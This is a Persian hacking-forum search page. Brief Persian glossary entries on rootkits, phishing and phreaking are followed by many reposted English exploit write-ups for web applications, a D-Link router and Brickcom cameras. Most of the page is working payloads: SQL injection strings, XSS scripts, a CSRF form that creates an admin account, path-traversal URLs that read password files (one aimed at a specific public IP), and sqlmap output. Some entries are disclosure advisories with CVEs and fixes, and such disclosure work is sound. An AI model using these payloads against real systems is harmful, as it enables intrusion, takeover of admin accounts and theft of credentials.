رفتن به مطلب

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'Hacking'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • AnonySec
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پروژه های شرکت
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

دسته ها

  • Articles

690 نتیجه پیدا شد

  1. Hacking

    یک پروتکل تحت شبکه برای سرویس گرفتن و سرویس دادن است. نفوذگران از تلنت برای بررسی باز بودن پورت‌های حیاتی استفاده می‌کنند.
  2. Hacking

    هرچند که RootKit ها را از برخی نظر‌ها می‌توان مانند BackDoor‌ها و یا تروجان‌ها دانست ولی از تروجان‌ها و بک دورها بسیار خطرناک تر اند. روت کیت‌ها پس از نفوذ به سیستم علاوه بر وظایف تروجان‌ها و Backdoor‌ها خود را جایگزین بخش‌های مهمی از سیستم عامل حتی هسته آن می‌کنند و دسترسی‌های مهلک و بعضا غیر قابل شناسایی به نفوذگران می‌دهند. اولین روت کیت‌ها در سال 1990 شناسایی شدند و از آن زمان تا کنون روت کیت‌های متنوعی برای سیستم‌های عامل لینوکسی و ویندوزینوشته شده اند، هر چند تعداد RootKit‌هایی که برای سیستم عامل لینوکس نوشته شده است بیشتر از ویندوز است. یکی از انواع RootKit‌های معروف در لینوکس خود را جایگزین برنامه /bin/login می کنند و یک پسورد ریشه به این برنامه می‌افزایند. اکثر روت کیت‌ها خود را جایگزین برنامه‌های زیر می‌کنند: DU Find Ifconfig Login ls Netstat ps البته خطرناک ترین نوع RootKit آن نوعی است که خود را جایگزین هسته سیستم عامل می‌کند، چون دیگر هسته سیستم عامل را بدست گرفته است و حتی روی عملکرد نرم افزارهای اسکن ویروس و روتکیت هم تاثیر می‌گذارد و به سادگی آن‌ها را غیر فعال و بی خاصیت می‌کند. با روت کیت‌های سطح هسته شخص نفوذگر می‌تواند تمام عملیات و فعالیت‌ها را به صورت کامل و بی درد سر ذخیره و شنود کند. از مهم ترین روت کیت‌های سطح هسته لینوکسی می‌توان به Knrak و Adore اشاره کرد که می‌توان آن‌ها را از اینترنت دانلود کرد.
  3. Hacking

    حملات فیشینگ را می‌توان از حملات مرتبط با حوزه مهندسی اجتماعی دانست. شخص نفوذگر با استفاده از فیشینگ شروع به سرقت اطلاعات از حجم عظیمی از کاربران می‌کند. یکی از حملات معروف فیشینگ ارسال ایمیل‌های جعلی از سمت بانک است. بدین نحو که یک نفوذگر ایمیل جعلی از سمت یک بانک را برای تعداد زیادی کاربر ایمیل می‌کند و در آن یک لینک قرار می‌دهد که به جای هدایت به صفحه اصلی بانک کاربر را به صفحه‌ای مشابه صفحه بانک هدایت می‌کند. کاربر پس از دیدن صفحه‌ای مشابه صفحه بانک و وارد کردن یوزرنیم و پسورد خود در دام هکر می‌افتد. در برخی حملات فیشینگ نام کاربری و رمز عبور هزاران کاربر بانک به سرقت می‌روند. البته فیشینگ به سرقت اطلاعات از طریق مکالمات تلفنی یا پیام کوتاه نیز اطلاق می‌شود. به این معنا که گاهی نفوذگران با تماس تلفنی سعی در تخلیه اطلاعاتی کاربران دارند.
  4. Hacking

    در دهه‌های پیش پریکر‌ها بیشترین جولان می‌دادند. پریکر‌ها به شبکه‌های تلفن نفوذ می‌کنند و مکالمه‌ها را استراق می‌کنند. این پریکرها ممکن است پروژه‌هایی را برای سازمان‌های مخفی و خلافکار اجرا کنند، بنابراین پریکر بودن یک جرم است و پریکرها در تمام نظام‌های حقوقی جهان محاکمه و مجازات می‌شوند. البته برخی از پریکر‌ها نیز تنها برای خود کار می‌کنند و از دانش خود برای تماس مجانی استفاده می‌کنند.
  5. Hacking

    واکر به نفوذگر کلاه سیاهی گفته می‌شود که به منظور سرقت اطلاعات وارد سیستم‌های دیگر می‌شود. مثلا یک واکر بر اساس سفارشی که می‌گیرد وارد سامانه ثبت احوال شده و اطلاعات محل سکونت یک شخص را در اختیار خلاف کاران می‌گذارد.
  6. Hacking

    # # # # # # Exploit Title: FineCMS 1.0 Multiple Vulnerabilities # Dork: N/A # Date: 29.08.2017 # Vendor Homepage : http://mvc.net.pl/ # Software Link: https://github.com/andrzuk/FineCMS # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: sohaip-hackerDZ # Author Web: http://www.hacker-ar.com # Author Social: @sohaip_hackerDZ # # # # # Reflected XSS in get_image.php Technical Description: file /application/lib/ajax/get_image.php the $_POST['id'] and $_POST['name'] and $_GET['folder'] without any validated, sanitised or output encoded. Proof of Concept(PoC) http://your_finecms/application/lib/ajax/get_image.php?folder=1 POST: id=1"><script>alert(1)</script>&name=1 Arbitrary File Modify Technical Description: The base function for modify the template can modify the filename,this leads to the Arbitrary File Modify, who could allow attacker getshell. file /appalication/core/controller/template.php line50-line53 follow function save() file /appalication/core/model/template.php line26-line48 if file exists, we can modify it whihout any limit. insterestingly, there are two more Vulnerability for same function in different files. file /appalication/core/model/style.php line26-line48 file /appalication/core/model/script.php line26-line48 Proof of Concept(PoC) http://your_finecms/index.php?route=template http://your_finecms/index.php?route=style http://your_finecms/index.php?route=script POST: contents=<?php phpinfo();?>&filename={any exist filename}&savabutton=Zapisz Authenticated SQL injection all FineCMS use PDO to connect the mysql server, so all the data without any validated, sanitised or output encoded injection database.but in application/core/controller/excludes.php, the website author use mysqli to connect mysql server.the lead SQL injection, who could allow attacker use some payload to get data in database. Technical Description: file application/core/controller/excludes.php line75, the visitor_ip insert into database without any validated, sanitised or output encoded. file /stat/get_stat_data.php line30 the sql inject into sql_query and execute. Proof of Concept(PoC) http://your_finecms/index.php?route=excludes&action=add POST: visitor_ip=1%27%2Csleep%281%29%2C%271&save_button=Zapisz and view http://your_finecms/stat/get_stat_data.php,we can feel website loading sleep. Stored XSS in images.php FineCMS allow admin to upload image into gallery, and it will show image data into pages, but some data will output into pages without any validated, sanitised or output encoded. they allow attacker Cross Site Scripting. Technical Description: when we upload the file file application/core/controller/images.php line87 and follow the function add() file application/core/model/images.php line78 if filetype startwith "image",the filetype will insert into database when we view the detail of the images file application/lib/generators/view.php line106, somethings will output into pages. Proof of Concept(PoC) view the http://your_finecms/index.php?route=images&action=add and upload picture modify the picture's filetype view the detail of picture Because of the vulnerability also in edit detail page. so you also can use edit to insert Script code in pages. http://your_finecms/index.php?route=images&action=edit&id=15 view the detail of picture Stored XSS in visitors.php FineCMS stores all the visitors the visit url, but in detail of log they output into pages without any validated, sanitised or output encoded. they allow attacker Cross Site Scripting. Technical Description: just like last vulnerability. Proof of Concept(PoC) visit any page with js script code. such as index.php?route=images&action=view&id=14'"><script>alert(1)</script>
  7. Hacking

    # # # # # # Exploit Title: Smart Chat - PHP Script 1.0.0 - Authentication Bypass # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://codesgit.com/ # Software Link: https://www.codester.com/items/997/smart-chat-php-script # Demo: http://demos.codesgit.com/smartchat/ # Version: 1.0.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/admin.php # User: 'or 1=1 or ''=' Pass: anything # # http://localhost/[PATH]/index.php?p=smiles&handel=[SQL] # # '+/*!11112UniOn*/+/*!11112sELeCT*/+0x31,0x32,/*!11112coNcAT_Ws*/(0x7e,/*!11112usER*/(),/*!11112DatAbASe*/(),/*!11112vErsIoN*/())--+- # # Etc... # # # # #
  8. Hacking

    # # # # # # Exploit Title: FTP Made Easy PRO 1.2 - SQL Injection # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Link: https://codecanyon.net/item/ftp-made-easy-pro-php-multiple-ftp-manager-client-with-code-editor/17460747 # Demo: http://codecanyon.nelliwinne.net/FTPMadeEasyPRO/ # Version: 1.2 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/admin-ftp-del.php?id=[SQL] # http://localhost/[PATH]/admin-ftp-change.php?id=[SQL] # # 755'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+''=' # # Etc.. # # # # #
  9. Hacking

    # # # # # # Exploit Title: WYSIWYG HTML Editor PRO 1.0 - Arbitrary File Download # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Link: https://codecanyon.net/item/wysiwyg-html-editor-pro-php-based-editor-with-image-uploader-and-more/19012022 # Demo: http://codecanyon.nelliwinne.net/WYSIWYGEditorPRO/ # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The security obligation allows an attacker to arbitrary download files.. # # Vulnerable Source: # # ............. # <?php # $file = base64_decode($_GET['id']); # # if (file_exists($file)) { # header('Content-Description: File Transfer'); # header('Content-Type: application/octet-stream'); # header('Content-Disposition: attachment; filename="'.basename($file).'"'); # header('Expires: 0'); # header('Cache-Control: must-revalidate'); # header('Pragma: public'); # header('Content-Length: ' . filesize($file)); # readfile($file); # exit; # } # ?> # ............. # Proof of Concept: # # http://localhost/[PATH]/wysiwyg/download.php?id=[FILENAME_to_BASE64] # # Etc... # # # # #
  10. Hacking

    # # # # # # Exploit Title: Easy Web Search 4.0 - SQL Injection # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Link: https://codecanyon.net/item/easy-web-search-php-search-engine-with-image-search-and-crawling-system/17574164 # Demo: http://codecanyon.nelliwinne.net/EasyWebSearch/ # Version: 4.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/admin/admin-delete.php?id=[SQL] # http://localhost/[PATH]/admin/admin-spidermode.php?id=[SQL] # # 755'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+''=' # # Etc.. # # # # #
  11. # # # # # # Exploit Title: Joomla! Component Joomanager 2.0.0 - Arbitrary File Download # Dork: N/A # Date: 30.08.2017 # Vendor Homepage: http://www.joomanager.com/ # Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/joomanager/ # Demo: http://www.joomanager.com/demo/realestate # Version: 2.0.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The security obligation allows an attacker to arbitrary download files.. # # Proof of Concept: # # http://localhost/[PATH]/index.php?option=com_joomanager&controller=details&task=download&path=[FILE] # # Etc.. # # # # #
  12. # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # <!-- # Exploit Title: Invoice Manager v3.1 - Cross site request forgery (Add Admin) # Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer # Dork: inurl:controller=pjAdmin # Date: 30.08.2017 # Homepage: https://www.phpjabbers.com/invoice-manager/ # Software Demo Link: http://demo.phpjabbers.com/1504048815_513/index.php?controller=pjAdmin&action=pjActionLogin # Version: 3.1 # Category: Webapps /php # Tested on: mozila firefox # # --> # ======================================================== # # # Invoice Manager v3.1 Cross site request forgery (Add Admin) # # Description : Invoice Manager v3.1 is vulnerable to CSRF attack (No CSRF token in place) which if an admin user can be # tricked to visit a crafted URL created by attacker (via spear phishing/social engineering). # Once exploited, the attacker can login as the admin using the email and the password in the below exploit. # # # ======================CSRF POC (Adding New user with Administrator Privileges)================================== <html> <body> <form name="csrf_form" action="http://localhost/invoice/index.php?controller=pjAdminUsers&action=pjActionCreate" method="post"> <input name="user_create" id="user_create" value="1" type="hidden"> <input name="role_id" id="role_id" value="1" type="hidden" > <input name="email" id="email" value="[email protected]" type="hidden"> <input name="password" id="password" value="12341234" type="hidden"> <input name="name" id="name" value="Ali BawazeEer" type="hidden"> <input name="phone" id="phone" value="911911911" type="hidden"> <input name="status" id="status" value="T" type="hidden"> <script type="text/javascript">document.csrf_form.submit();</script> </body> </html> # =================================================EOF ======================================================= # # # Risk : attackers are able to gain full access to the administrator panel after chaning the password for the admin # and thus have total control over the web application, including content change,and change user's account download backup of the site access to user's data.. # # # Remedy : developer should implement CSRF token for each request # # # # ======================================================== # [+] Disclaimer # # Permission is hereby granted for the redistribution of this advisory, # provided that it is not altered except by reformatting it, and that due # credit is given. Permission is explicitly given for insertion in # vulnerability databases and similar, provided that due credit is given to # the author. The author is not responsible for any misuse of the information contained # herein and prohibits any malicious use of all security related information # or exploits by the author or elsewhere. # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
  13. Hacking

    # Exploit Title: D-Link DIR-600 - Authentication Bypass (Absolute Path Traversal Attack) # CVE - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12943 # Date: 29-08-2017 # Exploit Author: Jithin D Kurup # Contact : https://in.linkedin.com/in/jithin-d-kurup-77b616142 # Vendor : www.dlink.com # Version: Hardware version: B1 Firmware version: 2.01 # Tested on:All Platforms 1) Description After Successfully Connected to D-Link DIR-600 Router(FirmWare Version : 2.01), Any User Can Easily Bypass The Router's Admin Panel Just by adding a simple payload into URL. D-Link DIR-600 Rev Bx devices with v2.x firmware allow remote attackers to read passwords via a model/__show_info.php?REQUIRE_FILE= absolute path traversal attack, as demonstrated by discovering the admin password. Its More Dangerous when your Router has a public IP with remote login enabled. IN MY CASE, Tested Router IP : http://190.164.170.249 Video POC : https://www.youtube.com/watch?v=PeNOJORAQsQ 2) Proof of Concept Step 1: Go to Router Login Page : http://190.164.170.249:8080 Step 2: Add the payload to URL. Payload: model/__show_info.php?REQUIRE_FILE=%2Fvar%2Fetc%2Fhttpasswd Bingooo You got admin Access on router. Now you can download/upload settiing, Change setting etc. ---------------Greetz---------------- +++++++++++ www.0seccon.com ++++++++++++ Saran,Dhani,Gem,Vignesh,Hemanth,Sudin,Vijith
  14. Hacking

    ----------------------------------------------------------------------------------- |<!-- # Exploit Title: User Login and Management PHP Script - multiple vulnerabilities # Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer # Dork: N/A # Date: 29.08.2017 # software link : https://www.codester.com/items/469/user-login-and-management-php-script # demo : http://froiden.cloudapp.net/LoginDashboard/index.php # Version: 3.04 # Category: Webapps # Tested on: windows64bit / mozila firefox # # |--!> |---------------------------------------------------------------------------------- 1) admin dashboard authentication bypass Description : An Attackers are able to completely compromise the web application built upon the user login and management php script as they can gain access to the admin panel and manage other users as an admin without authentication! Step 1: Create a rule in No-Redirect Add-on: ^http://localhost/LoginDashboard/admin/index.php Step 2: Access http://localhost/LoginDashboard/admin/dashboard.php Risk : Unauthenticated attackers are able to gain full access to the administrator panel and thus have total control over the application and users , including add admin user .. etc |---------------------------------------------------------------------------------- 2) account takeover - cross side request forgery Description : attacker can craft a malicious page and send it to any user who is already authenticated to change the password > exploitation < <html> <body> <form name="csrf_form" action="http://localhost/LoginDashboard/code/ajaxChangePassword.php?password=1234567890&cpassword=1234567890" method="POST"> <script type="text/javascript">document.csrf_form.submit();</script> </body> </html> |-----------------------------------------EOF-----------------------------------------
  15. Hacking

    1. Advisory Information ======================================== Title: Brickcom IP-Camera Remote Credentials and Settings Disclosure Vendor Homepage: http://www.brickcom.com Tested on Camera types: WCB-040Af, WCB-100A, WCB-100Ae, OB-302Np, OB-300Af, OB-500Af Remotely Exploitable: Yes Vulnerability: Username / Password / Settings Disclosure (Critical) Shodan Dork: title:"Brickcom" Date: 14/12/2016 Authors: Emiliano Ipar (@maninoipar) (linkedin.com/in/emilianoipar) Ignacio Agustín Lizaso (@ignacio_lizaso) (linkedin.com/in/ignacio- lizaso-9ab73359) Gastón Emanuel Rivadero (@derlok_epsilon) (linkedin.com/in/gaston- emanuel-rivadero-858b9ba) 2. CREDIT ======================================== This vulnerability was identified during penetration test and Research by Emiliano Ipar, Ignacio Lizaso and Gastón Rivadero. 3. Description ======================================== Brickom Cameras allow a low-privilege user to disclose every configuration in the NVRAM, including credentials in clear text, remotely by making a simple requests. This vulnerability, coupled with the fact that there are two default users with known passwords which are rarely modified, allows an attacker to disclose the admin password and latter every config. The most Critical API call is users.cgi?action=getUsers, which provides every user credential. Many other API calls to get information for the WIFI password or FTP credentials, even the whole configuration, are affected depending on the camera model. On the hardware side, the UART console of some models (example: WCB-040Af, with baudrate 38400) is exposed in the PCB and after soldering the corresponding pins and connecting, the resulting shell has root access. A simple NVSHOW command will list every config available in clear text, including credentials. 4. Proof-of-Concept: ======================================== Using the following GET request: curl http://<IP>:<PORT>/cgi-bin/users.cgi?action=getUsers -u user:pass -v Request: ---------- > GET /cgi-bin/users.cgi?action=getUsers HTTP/1.1 > Authorization: Basic <BASE64 user:pass> > User-Agent: curl/7.35.0 > Host: <IP>:<PORT> > Accept: */* > Response: ---------- < HTTP/1.1 200 Ok < Server: mini_httpd < Cache-Control: no-cache < Pragma: no-cache < Expires: 0 < Content-Type: text/html < Connection: close < size=3 User1.index=0 User1.username=admin User1.password=admin User1.privilege=1 User2.index=1 User2.username=viewer User2.password=viewer User2.privilege=0 User3.index=3 User3.username=rviewer User3.password=rviewer User3.privilege=2 5. SOLUTION ======================================== The vendor has been contacted and the firmware was updated. See disclosure in: https://www.brickcom.com/news/productCERT_security_advisorie.php
  16. # Exploit Title Unauthenticated SQL Injection in Huge-IT Portfolio Gallery Plugin v1.0.6 # Date: 2016-09-16 # Exploit Author: Larry W. Cashdollar, @_larry0 # Vendor Homepage: http://huge-it.com/joomla-portfolio-gallery/ # Software Link: # Version: 1.0.6 # Tested on: Linux # CVE : CVE-2016-1000124 # Advisory: http://www.vapidlabs.com/advisory.php?v=170 # Exploit: • $ sqlmap -u 'http://example.com/components/com_portfoliogallery/ajax_url.php' --data="page=1&galleryid=*&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2" • • • (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] • sqlmap identified the following injection point(s) with a total of 2870 HTTP(s) requests: • --- • Parameter: #1* ((custom) POST) • Type: error-based • Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR) • Payload: page=1&galleryid=-2264 OR 1 GROUP BY CONCAT(0x71716a7a71,(SELECT (CASE WHEN (3883=3883) THEN 1 ELSE 0 END)),0x7178627071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2 • • Type: AND/OR time-based blind • Title: MySQL >= 5.0.12 time-based blind - Parameter replace • Payload: page=1&galleryid=(CASE WHEN (9445=9445) THEN SLEEP(5) ELSE 9445 END)&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2 • --- • [13:30:39] [INFO] the back-end DBMS is MySQL • web server operating system: Linux Debian 8.0 (jessie) • web application technology: Apache 2.4.10 • back-end DBMS: MySQL >= 5.0.12 • [13:30:39] [WARNING] HTTP error codes detected during run: • 500 (Internal Server Error) - 2715 times • [13:30:39] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.4' • • [*] shutting down at 13:30:39
  17. # Exploit Title Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla # Date: 2016-09-16 # Exploit Author: Larry W. Cashdollar, @_larry0 # Vendor Homepage: http://huge-it.com/joomla-catalog/ # Software Link: # Version: 1.0.7 # Tested on: Linux # CVE : CVE-2016-1000125 # Advisory: http://www.vapidlabs.com/advisory.php?v=171 # Exploit: • $ sqlmap -u 'http://example.com/components/com_catalog/ajax_url.php' --data="prod_page=1&post=load_more_elements_into_catalog&catalog_id=*&old_count=*&count_into_page=*&show_thumbs=*&show_description=*&parmalink=*" • • Parameter: #1* ((custom) POST) • Type: error-based • Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR) • Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=-2369 OR 1 GROUP BY CONCAT(0x717a627871,(SELECT (CASE WHEN (1973=1973) THEN 1 ELSE 0 END)),0x716b787671,FLOOR(RAND(0)*2)) HAVING MIN(0)#&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink= • • Type: AND/OR time-based blind • Title: MySQL >= 5.0.12 time-based blind - Parameter replace • Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=(CASE WHEN (7371=7371) THEN SLEEP(5) ELSE 7371 END)&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink= • • Type: UNION query • Title: Generic UNION query (random number) - 15 columns • Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=-5943 UNION ALL SELECT 2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,CONCAT(0x717a627871,0x494a475477424c724f6f7853556d61597544576f4b614d6e41596771595253476c4251797a685974,0x716b787671)-- FvOy&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink= • --- • [16:48:10] [INFO] the back-end DBMS is MySQL • web server operating system: Linux Debian 8.0 (jessie) • web application technology: Apache 2.4.10 • back-end DBMS: MySQL >= 5.0.12 • [16:48:10] [WARNING] HTTP error codes detected during run: • 500 (Internal Server Error) - 6637 times • [16:48:10] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com' • • [*] shutting down at 16:48:10
  18. Hacking

    # # # # # # Exploit Title: Joomla! Component Quiz Deluxe 3.7.4 - SQL Injection # Dork: N/A # Date: 30.08.2017 # Vendor Homepage: http://joomplace.com/ # Software Link: https://extensions.joomla.org/extensions/extension/living/education-a-culture/quiz-deluxe/ # Demo: http://demo30.joomplace.com/our-products/joomla-quiz-deluxe # Version: 3.7.4 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/index.php?option=com_joomlaquiz&task=ajaxaction.flag_question&tmpl=component&stu_quiz_id=[SQL] # http://localhost/[PATH]/index.php?option=com_joomlaquiz&task=ajaxaction.flag_question&tmpl=component&flag_quest=[SQL] # # Etc.. # # # # #
  19. # Exploit Title Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9 for Joomla # Google Dork: [if applicable] # Date: 2016-09-15 # Exploit Author: Larry W. Cashdollar, @_larry0 # Vendor Homepage: http://huge-it.com/joomla-video-gallery/ # Software Link: # Version: 1.0.9 # Tested on: Linux # CVE : CVE-2016-1000123 # Advisory: http://www.vapidlabs.com/advisory.php?v=169 # Exploit: • $ sqlmap -u 'http://server/components/com_videogallerylite/ajax_url.php' --data="page=1&galleryid=*&task=load_videos_content&perpage=20&linkbutton=2" • . • . • . • (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] • sqlmap identified the following injection point(s) with a total of 2870 HTTP(s) requests: • --- • Parameter: #1* ((custom) POST) • Type: error-based • Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR) • Payload: page=1&galleryid=-3390 OR 1 GROUP BY CONCAT(0x716b766271,(SELECT (CASE WHEN (2575=2575) THEN 1 ELSE 0 END)),0x7170767071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&task=load_videos_content&perpage=20&linkbutton=2 • • Type: AND/OR time-based blind • Title: MySQL >= 5.0.12 time-based blind - Parameter replace • Payload: page=1&galleryid=(CASE WHEN (5952=5952) THEN SLEEP(5) ELSE 5952 END)&task=load_videos_content&perpage=20&linkbutton=2 • --- • [19:36:55] [INFO] the back-end DBMS is MySQL • web server operating system: Linux Debian 8.0 (jessie) • web application technology: Apache 2.4.10 • back-end DBMS: MySQL >= 5.0.12 • [19:36:55] [WARNING] HTTP error codes detected during run: • 500 (Internal Server Error) - 2714 times • [19:36:55] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.4' • • [*] shutting down at 19:36:55
  20. # Exploit Title: Wordpress Plugin Participants Database < 1.7.5.10 - XSS # Google Dork: inurl:wp-content/plugins/participants-database/ # Date: 01-Sep-17 # Exploit Author: Benjamin Lim # Vendor Homepage: https://xnau.com/ # Software Link: https://wordpress.org/plugins/participants-database/ # Version: 1.7.5.9 # Tested on: Kali Linux 2.0 # CVE : CVE-2017-14126 1. Product & Service Introduction: ================================== Participants Database is a Wordpress plugin for managing a database of participants, members or volunteers. As of now, the plugin has been downloaded 320,000 times and has 10,000+ active installs. 2. Technical Details & Description: =================================== Cross site scripting (XSS) vulnerability in the Wordpress Participants Database plugin 1.7.59 allows attackers to inject arbitrary javascript via the Name parameter. The XSS vulnerability is found on the participant signup form input textfield. The get_field_value_display() function in PDb_FormElement.class.php did not escape HTML special characters, allowing an attacker to input javascript. The XSS code will be executed on 2 pages. 1) The "Thank you for signing up" page immediately after submitting the form. 2) The page which is configured to output the list of participants with the [pdb_list] shortcode. 3. Proof of Concept (PoC): ========================== curl -k -F action=signup -F subsource=participants-database -F shortcode_page=/?page_id=1 -F thanks_page=/?page_id=1 -F instance_index=2 -F pdb_data_keys=1.2.9.10 -F session_hash=0123456789 -F first_name=<script>alert("1");</script> -F last_name=a -F [email protected] -F mailing_list=No -F submit_button=Submit http://localhost/?page_id=1 To trigger manually, browse to the page, input the following in the form and click Sign Up. First Name: <script>alert("1");</script> Last Name: test Email: [email protected] 4. Mitigation ============= Update to version 1.7.5.10 5. Disclosure Timeline ====================== 2017/09/01 Vendor contacted 2017/09/02 Vendor responded 2017/09/03 Update released 2017/09/06 Advisory released to the public 6. Credits & Authors: ===================== Benjamin Lim - [https://limbenjamin.com] -- *Benjamin Lim* E: [email protected] PGP : https://limbenjamin.com/pgp
  21. Hacking

    Document Title: =============== Wibu Systems AG CodeMeter 6.50 - Persistent XSS Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2074 ID: FB49498 Acknowledgements: https://www.flickr.com/photos/vulnerabilitylab/36912680045/ http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13754 CVE-ID: ======= CVE-2017-13754 Release Date: ============= 2017-09-04 Vulnerability Laboratory ID (VL-ID): ==================================== 2074 Common Vulnerability Scoring System: ==================================== 3.5 Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== CodeMeter is the universal technology for software publishers and intelligent device manufacturers, upon which all solutions from Wibu-Systems are built. You want to protect the software you have developed against piracy and reverse engineering. CodeMeter requires your attention only once: its integration in your software and your business workflow is necessary at one point in time only. Protection Suite is the tool that automatically encrypts your applications and libraries. In addition, CodeMeter offers an API for custom integration with your software. (Copy of the Homepage: http://www.wibu.com/us/codemeter.html ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a persistent input validation vulnerability in the official Wibu Systems CodeMeter WebAdmin v6.50 application. Vulnerability Disclosure Timeline: ================================== 2017-05-20: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH) 2017-05-21: Vendor Notification (Wibu Systems AG - Security Department) 2017-05-22: Vendor Response/Feedback 